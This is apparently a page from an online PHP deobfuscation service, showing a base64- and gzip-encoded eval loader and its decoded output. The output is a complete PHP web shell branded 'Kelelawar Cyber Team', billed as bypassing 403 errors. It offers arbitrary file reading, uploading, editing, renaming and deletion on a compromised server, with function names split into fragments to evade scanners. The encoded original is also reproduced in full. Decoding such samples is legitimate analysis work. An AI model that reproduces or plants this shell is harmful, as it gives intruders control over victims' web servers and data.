Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?=eval("?>".gzuncompress(base64_decode("eJzVWvtv2zgS/j1A/geGyFXOto7sxHlbKvpI07u2m+CSXVwvD..
Decoded Output download
None?>b'<?php
/*
Kelelawar Cyber Team
Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell Bypass 403
*/
set_time_limit(0);
error_reporting(0);
error_log(0);
$sname = "<font color=white><b>[!] Mini Shell Bypass 403 [!]";
$__gcdir = "g" . "etcwd";
$__fgetcon7s = "file" . "_get_contents";
$__scdir = "s" . "candi" . "r";
$rm__dir = "rmd" . "ir";
$un__link = "un" . "link";
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo \'<!DOCTYPE html><html><head><link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/><title>xXx Kelelawar Cyber Team xXx</title></head><body style=background-color:green;>\';
echo \'<div style="color:red;margin-top:0;"><h1><center>\' . $sname . \'</center></h1></div>\';
if (isset($_GET[\'path\'])) {
$path = $_GET[\'path\'];
chdir($_GET[\'path\']);
} else {
$path = $__gcdir();
}
$path = str_replace("\", "/", $path);
$paths = explode("/", $path);
echo \'<table width="90%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';
echo "<font style=\'font-size:13px;\'>Path Dir: ";
foreach ($paths as $id => $pat) {
echo "<a style=\'font-size:13px;\' href=\'?path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "\'>$pat</a>/";
}
echo \'<br>[ <a href="?">Homepage</a> ]</font></td><td align="center" width="20%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:white;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';
if (isset($_FILES[\'file\'])) {
if (copy($_FILES[\'file\'][\'tmp_name\'], $path . \'/\' . $_FILES[\'file\'][\'name\'])) {
echo \'<center><font color="white">Upload OK!</font></center><br/>\';
} else {
echo \'<center><font color="red">Bisa upload!</font></center><br/>\';
}
}
echo \'</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">\';
echo \'\';
if (isset($_GET[\'filesrc\'])) {
echo \'<table width="80%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';
echo "" . basename($_GET[\'filesrc\']);
"";
echo \'</tr></td></table><br />\';
echo ("<center><textarea readonly=\'\'>" . htmlspecialchars($__fgetcon7s($_GET[\'filesrc\'])) . "</textarea></center>");
} elseif (isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\') {
echo \'</table><br /><center>\' . $_POST[\'path\'] . \'<br /><br />\';
if ($_POST[\'opt\'] == \'rename\') {
if (isset($_POST[\'newname\'])) {
if (rename($_POST[\'path\'], $path . \'/\' . $_POST[\'newname\'])) {
echo \'<center><font color="white">Rename OK!</font></center><br />\';
} else {
echo \'<center><font color="red">Rename Gagal!</font></center><br />\';
}
$_POST[\'name\'] = $_POST[\'newname\'];
}
echo \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\' . $_POST[\'name\'] . \'" /> <input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';
} elseif ($_POST[\'opt\'] == \'edit\') {
if (isset($_POST[\'src\'])) {
$fp = fopen($_POST[\'path\'], \'w\');
if (fwrite($fp, $_POST[\'src\'])) {
echo \'<center><font color="white">Edit File OK!.</font></center><br />\';
} else {
echo \'<center><font color="red">Edit Gagal!.</font></center><br />\';
}
fclose($fp);
}
echo \'<form method="POST"><textarea cols=100 rows=25 name="src">\' . htmlspecialchars($__fgetcon7s($_POST[\'path\'])) . \'</textarea><br /><input type="hidden" name="path" value="\' . $_POST[\'path\'] . \'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';
}
echo \'</center>\';
} else {
echo \'</table><br /><center>\';
if (isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\') {
if ($_POST[\'type\'] == \'dir\') {
if ($rm__dir($_POST[\'path\'])) {
echo \'<center><font color="white">Dir Deleted!</font></center><br />\';
} else {
echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';
}
} elseif ($_POST[\'type\'] == \'file\') {
if ($un__link($_POST[\'path\'])) {
echo \'<font color="white">Delete File Done.</font><br />\';
} else {
echo \'<font color="red">Delete File Error.</font><br />\';
}
}
}
echo \'</center>\';
$_scdir = $__scdir($path);
echo \'<div id="content"><table width="90%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="10%"><center>Size</center></th><th width="9%"><center>Permissions</center></th> <th width="10%"><center>Last Update</center></th><th width="10%"><center>Options</center></th></tr>\';
foreach ($_scdir as $dir) {
if (!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\')
continue;
echo "<tr><td>[Dir] <a href=\"?path=$path/$dir\">$dir</a></td><td><center>--</center></td><td><center>";
if (is_writable("$path/$dir"))
echo \'<font color="white">\';
elseif (!is_readable("$path/$dir"))
echo \'<font color="red">\';
echo perms("$path/$dir");
if (is_writable("$path/$dir") || !is_readable("$path/$dir"))
echo \'</font>\';
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . "";
echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
foreach ($_scdir as $file) {
if (!is_file("$path/$file"))
continue;
$size = filesize("$path/$file") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . \' MB\';
} else {
$size = $size . \' KB\';
}
echo "<tr><td>[File] <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td><center>" . $size . "</center></td><td><center>";
if (is_writable("$path/$file"))
echo \'<font color="white">\';
elseif (!is_readable("$path/$file"))
echo \'<font color="red">\';
echo perms("$path/$file");
if (is_writable("$path/$file") || !is_readable("$path/$file"))
echo \'</font>\';
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . "";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>";
}
echo \'</table></div>\';
}
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
$info = \'s\';
} elseif (($perms & 0xA000) == 0xA000) {
$info = \'l\';
} elseif (($perms & 0x8000) == 0x8000) {
$info = \'-\';
} elseif (($perms & 0x6000) == 0x6000) {
$info = \'b\';
} elseif (($perms & 0x4000) == 0x4000) {
$info = \'d\';
} elseif (($perms & 0x2000) == 0x2000) {
$info = \'c\';
} elseif (($perms & 0x1000) == 0x1000) {
$info = \'p\';
} else {
$info = \'u\';
}
$info .= (($perms & 0x0100) ? \'r\' : \'-\');
$info .= (($perms & 0x0080) ? \'w\' : \'-\');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\') : (($perms & 0x0800) ? \'S\' : \'-\'));
$info .= (($perms & 0x0020) ? \'r\' : \'-\');
$info .= (($perms & 0x0010) ? \'w\' : \'-\');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\') : (($perms & 0x0400) ? \'S\' : \'-\'));
$info .= (($perms & 0x0004) ? \'r\' : \'-\');
$info .= (($perms & 0x0002) ? \'w\' : \'-\');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? \'T\' : \'-\'));
return $info;
}
echo \'</body></html><!-- EOF -->\';
?>'Did this file decode correctly?
Original Code
<?=eval("?>".gzuncompress(base64_decode("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"))); __halt_compiler();?>Function Calls
| gzuncompress | 1 |
| base64_decode | 1 |
Stats
| MD5 | 524553d3c00a9ae4a17a766eea3289de |
| Eval Count | 1 |
| Decode Time | 68 ms |